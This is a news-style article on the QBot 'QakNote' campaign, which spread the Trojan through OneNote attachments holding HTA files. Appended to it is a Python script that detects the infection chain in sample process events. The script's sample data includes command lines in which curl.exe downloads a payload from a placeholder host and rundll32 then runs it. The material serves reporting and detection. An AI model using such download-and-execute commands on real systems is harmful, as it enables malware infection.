    QBot operators now use OneNote to spread Trojan via email

    Security company Sophos has discovered a new QBot campaign dubbed “QakNote,” which uses malicious Microsoft OneNote attachments to infect systems with a banking Trojan.

    A new Sophos report says the campaign began on January 31, 2023 and uses OneNote files containing an embedded HTML application (HTA file) that retrieves the QBot malware payload. This shift in QBot distribution was first publicly reported by Cynet researcher Max Malyutin on Twitter on January 31, 2023.

    The script in the HTA file uses the legitimate application "curl.exe" to download the QBot DLL into the "C:\ProgramData" folder and then executes it with "Rundll32.exe".

    The QBot payload is then injected into the Windows Assistive Technology manager process (AtBroker.exe) to hide its presence and avoid detection by antivirus software.

    Sophos reports that QBot operators use two methods for distributing the HTA files: the first is sending emails with an embedded link to the malicious ".one" file, and the second is the "thread injection" method.

    Thread injection is a technique in which QBot operators hijack existing email threads and send a "reply to all" message to every participant in the thread, with the malicious OneNote file attached.

    To make these attacks even more deceptive, the attackers embed a fake button in the OneNote document that supposedly downloads the document from the cloud but, when clicked, launches the embedded HTA attachment instead. Although the user is warned about the risk of running the attachment after clicking the button, there is always a chance that the victim will ignore the warning.

    As a defense against this new attack vector, Sophos suggests that email administrators consider blocking all files with the ".one" extension, as they are not normally sent as attachments.
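    The execution chain described above (OneNote -> HTA -> curl.exe writing under C:\ProgramData -> rundll32.exe loading the payload from there) is concrete enough to hunt for in process-creation telemetry. The following is an added example, not code from Sophos or from this site: it runs a small detection over constructed process events (assumed field names pid, ppid, image, cmd; the paths, URL and export name are placeholders) and flags the two links of the chain, requiring a script-host ancestor for the curl.exe rule so that ordinary installers using curl are not reported.

```python
import re

# Constructed process-creation events (not real telemetry). Field names are assumed.
SAMPLE_EVENTS = [
    {"pid": 1, "ppid": 0, "image": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE", "cmd": "ONENOTE.EXE invoice.one"},
    {"pid": 2, "ppid": 1, "image": r"C:\Windows\System32\mshta.exe", "cmd": r"mshta.exe C:\Users\u\AppData\Local\Temp\Open.hta"},
    {"pid": 3, "ppid": 2, "image": r"C:\Windows\System32\curl.exe", "cmd": r"curl.exe -o C:\ProgramData\img.png http://placeholder.invalid/x"},
    {"pid": 4, "ppid": 2, "image": r"C:\Windows\System32\rundll32.exe", "cmd": r"rundll32.exe C:\ProgramData\img.png,PlaceholderExport"},
    {"pid": 9, "ppid": 0, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"pid": 5, "ppid": 9, "image": r"C:\Windows\System32\rundll32.exe", "cmd": "rundll32.exe shell32.dll,Control_RunDLL"},  # benign
    {"pid": 8, "ppid": 9, "image": r"C:\Windows\System32\curl.exe", "cmd": r"curl.exe -o C:\ProgramData\vendor\update.msi http://placeholder.invalid/u"},  # benign installer
]

PROGRAMDATA = re.compile(r"c:\\programdata\\", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "onenote.exe"}  # where the HTA stage is launched from


def image_name(path):
    """Return the lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def has_script_host_ancestor(by_pid, pid):
    """Walk the parent chain of pid and report whether mshta.exe or OneNote is an ancestor."""
    seen = set()
    pid = by_pid[pid]["ppid"]
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        if image_name(by_pid[pid]["image"]) in SCRIPT_HOSTS:
            return True
        pid = by_pid[pid]["ppid"]
    return False


def find_qaknote_chain(events):
    """Return (rule, pid) tuples for events matching the chain described in the article."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name = image_name(e["image"])
        if name == "curl.exe" and PROGRAMDATA.search(e["cmd"]) and has_script_host_ancestor(by_pid, e["pid"]):
            hits.append(("curl_to_programdata_from_script_host", e["pid"]))
        elif name == "rundll32.exe" and PROGRAMDATA.search(e["cmd"]):
            hits.append(("rundll32_loads_programdata_payload", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in find_qaknote_chain(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Pairing the two rules by shared parent (pid 2 here) gives a high-confidence alert; either rule alone is a lead worth triaging, and the rundll32.exe rule also catches later stages that no longer have the OneNote ancestor.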

    Author DeepWeb